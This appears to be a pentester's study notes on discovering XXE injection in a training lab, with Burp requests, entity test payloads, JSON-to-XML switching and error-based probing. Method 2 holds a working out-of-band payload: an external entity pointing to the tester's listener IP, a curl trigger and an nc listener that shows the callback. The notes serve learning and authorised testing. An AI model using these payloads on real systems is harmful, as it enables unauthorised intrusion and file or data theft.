DISCOVERY
METHOD 1: XML EXPECTED INPUT
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: 127.0.0.1
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
* forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
Request
...
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
Response
...
HTTP/1.1 200 OK
check your email email@email.com for verification...
* the email field is reflected in the response and may be vulnerable to xxe injection#perform test
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY company "XXE Injection Test">
]>
<root>
<name>First</name>
<tel></tel>
<email>&company;</email>
<message>This is a test email</message>
</root>
* if there is an xxe vulnerability, the XML entity named 'company' which is referenced by &company;
should be replaced with the value defined (XXE Injection Test)
Response
...
HTTP/1.1 200 OK
check your email testCompany for verification...
* if the HTTP response displayed the xxe reference element "&company;"
instead of the raw value "XXE Injection Test" then the webapp isn't vulnerable
to XXE Injection.
* if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
only the ENTITY element is requiredMETHOD 2:
root@oco:~$ sudo nmap -sC -sV -T4 10.129.196.91 -p-
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3001/tcp open http PHP cli server 5.5 or later
|_http-title: Login
3002/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3003/tcp open http PHP cli server 5.5 or later (PHP 7.4.3)
root@oco:~$ sudo nmap --script=vuln -T4 10.129.196.91 -p 3000-3003
PORT STATE SERVICE
3000/tcp open ppp
3001/tcp open nessus
3002/tcp open exlm-agent
3003/tcp open cgms
root@oco:~$ BROWSER > http://10.129.196.91:3001/
* this is a login form
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
email: test@null.com
password: password123
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /api/login/ HTTP/1.1
Host: 10.129.196.91:3001
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.196.91:3001
Referer: http://10.129.196.91:3001/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>
<root>
<email>test@null.com</email>
<password>password123</password>
</root>
* forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
* notice that an API is handling the user authentication functionality of the
application and the user authentication is generating XML data.
#craft exploit
root@oco:~$ nano payload.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://<VPN/TUN Adapter IP>:<LISTENER PORT>"> ]>
<root>
<email>test@test.com</email>
<password>P@ssw0rd123</password>
</root>
* A Document Type Definition (DTD) defines the structure, elements, and attributes of
an XML document. Declared within the DOCTYPE element, it can be internal or an
external resource.
#setup
root@oco:~$ nc -nlvp 4444
...
#trigger
root@oco:~$ Str1f3@htb[/htb]$ curl -X POST http://<TARGET IP>:3001/api/login -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://<VPN/TUN Adapter IP>:<LISTENER PORT>"> ]><root><email>&somename;</email><password>P@ssw0rd123</password></root>'
...
root@oco:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 54984
GET / HTTP/1.0
Host: <VPN/TUN Adapter IP>:4444
Connection: close
METHOD 3: JSON TO XML CONVERSION
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: 127.0.0.1
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /submitDetails.php HTTP/1.1
Accept: application/json
Content-Type: application/json
...
{"search":"name","value":"api..."}
* forms that appears to be sending user input data in an JSON format can be tested for potential XXE vulnerability as well
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
* Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML
even if a webapp sends requests in JSON format, try changing the "Content-Type" header to
"application/xml", and then convert the JSON data to XML via the JSON to XML Converter tool
#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Proxy > Intercept > Raw
Request
...
{"search":"name","value":"api..."}
Response
...
HTTP/1.1 200 OK
name: api ...#convert json data to xml
root@oco:~$ BROWSER > https://www.convertjson.com/json-to-xml.htm
Option 3 - Paste into Text Box: {"search":"name","value":"api..."}
Output:
<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>api...</value>
</root>
#perform test
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
Accept: application/json //test this one if this need to be changed
Content-Type: application/xml //changed the Content-Type: application/json to application/xml
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE email [
<!ENTITY name "XXE Injection Test">
]>
<root>
<search>&name;</search>
<value>api...</value>
</root>
Response
...
HTTP/1.1 200 OK
XXE Injection Test ...
check your email testCompany for verification...
* if the HTTP response displayed the xxe reference element "&name;"
instead of the raw value "XXE Injection Test" then the webapp isn't vulnerable
to XXE Injection.
* if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
only the ENTITY element is requiredERROR-BASED
this discovery method is used when the web application doesn't write any output from the attacker's XML input entities. thus the attacker is blind to the XML output and wouldn't be able to retrieve any file content using usual methods. in this case, attackers can test whether the webapp displays runtime errors such as PHP errors. this vulnerability can be utilized if the webapp does not have proper exception handling for the XML input. this flaw can be used to read the output of the XXE exploit
#perform test
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
Accept: application/json //test this one if this need to be changed
Content-Type: application/xml //changed the Content-Type: application/json to application/xml
<?xml version="1.0" encoding="UTF-8" ?>
<root>
<name>First</name>
<tel></tel>
<email>&nonExistingEntity;</email>
<message>This is a test email</message>
</root>
Response
...
HTTP/1.1 200 OK
<b>Warning</b>
: DOMDocument::loadXML(): Entity 'nonExistingEntity' not defined in Entity, line: 5 in...
* if the web application displays an error, it may reveal the web server directory, which can be used to read the source code of other files
* ALT: delete any of the closing tag so, it does not close (e.g. <roo> instead of <root>Last updated